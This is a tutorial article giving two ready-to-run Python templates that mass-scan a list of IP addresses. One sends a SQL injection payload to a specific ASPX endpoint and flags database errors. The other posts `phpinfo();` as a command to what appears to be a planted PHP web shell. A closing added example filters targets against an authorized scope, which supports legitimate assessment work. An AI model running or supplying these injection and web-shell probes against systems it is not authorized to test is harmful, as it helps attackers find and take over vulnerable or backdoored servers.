Batch Vulnerability Testing Scripts for GET and POST Requests
Batch vulnerability testing is essential for security assessments to validate potential issues efficiently. This article provides templates for GET and POST requests to automate this process.
GET Request Batch Script
This script reads IP addresses from a file and sends GET requests to test for vulnerabilities. Modify the URL and condition checks based on the specific vulnerability response.
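import requests

# Load one target address per line
with open('targets.txt', 'r') as file:
    addresses = file.readlines()

counter = 1
for addr in addresses:
    addr = addr.strip()
    if not addr:
        continue  # skip blank lines
    try:
        target_url = f'http://{addr}/client/messageurl.aspx?user=%27%20and%20(select%20db_name())>0--&pwd=1'
        response = requests.get(target_url, timeout=2)
        # Let requests guess the charset so the body decodes cleanly
        response.encoding = response.apparent_encoding
        content = response.text
        # Condition check: a database error surfaced in the response body
        if 'SqlException' in content:
            print(f'Vulnerability {counter}: {target_url}')
            counter += 1
    except Exception:
        # Unreachable host, timeout, etc.: move on to the next target
        continue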
POST Request Batch Script
For vulnerabilities requiring POST requests, use this script. Adjust headers, data payloads, and response checks as needed.
import requests

# Load one target address per line
with open('targets.txt', 'r') as file:
    addresses = file.readlines()

counter = 1
for addr in addresses:
    addr = addr.strip()
    if not addr:
        continue  # skip blank lines
    try:
        target_url = f'http://{addr}/20mm85.php'
        headers = {
            'Cookie': '',
            'User-Agent': 'Mozilla/5.0'
        }
        payload = {'cmd': 'phpinfo();'}
        result = requests.post(target_url, headers=headers, data=payload, timeout=2)
        content = result.content.decode('utf-8')
        # Condition check: the response body contains the expected marker
        if 'phpinfo' in content:
            print(f'Vulnerability {counter}: {target_url}')
            counter += 1
    except Exception:
        # Unreachable host, timeout, undecodable body, etc.: move on
        continue
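
Both the GET and the POST script interpolate every line of targets.txt straight into a URL, so a malformed or out-of-scope entry is probed like any other. The following added example (not part of the original article) filters the file against the authorized scope of the assessment before any request is sent; the function name, the CIDR scope list and the sample entries are assumptions, and the sample addresses are constructed from documentation ranges.

```python
import ipaddress

# Constructed sample of a targets file (documentation address ranges only)
SAMPLE_LINES = [
    '# engagement targets (constructed sample)\n',
    '192.0.2.10\n',
    '192.0.2.10\n',
    '\n',
    '198.51.100.7  # typo, belongs to someone else\n',
    '192.0.2.300\n',
    '192.0.2.44:8080/x\n',
]


def load_in_scope_targets(lines, scope_cidrs):
    """Hypothetical helper: split raw target lines into (accepted, rejected).

    accepted: de-duplicated IP strings inside the authorized scope, in file order.
    rejected: (line_number, entry, reason) tuples, kept for the assessment record.
    """
    scope = [ipaddress.ip_network(c, strict=False) for c in scope_cidrs]
    accepted, rejected, seen = [], [], set()
    for lineno, raw in enumerate(lines, start=1):
        entry = raw.split('#', 1)[0].strip()  # allow comments and blank lines
        if not entry:
            continue
        try:
            # Only a bare IP is accepted, so nothing else can reach the URL template
            ip = ipaddress.ip_address(entry)
        except ValueError:
            rejected.append((lineno, entry, 'not an IP address'))
            continue
        if not any(ip.version == net.version and ip in net for net in scope):
            rejected.append((lineno, entry, 'outside authorized scope'))
        elif ip in seen:
            rejected.append((lineno, entry, 'duplicate'))
        else:
            seen.add(ip)
            accepted.append(str(ip))
    return accepted, rejected


if __name__ == '__main__':
    ok, bad = load_in_scope_targets(SAMPLE_LINES, ['192.0.2.0/24'])
    print('in scope:', ok)
    for lineno, entry, reason in bad:
        print(f'line {lineno}: {entry!r} rejected ({reason})')
```

In either script, the `addresses` list would then be the accepted list returned by this function rather than the raw `file.readlines()` output.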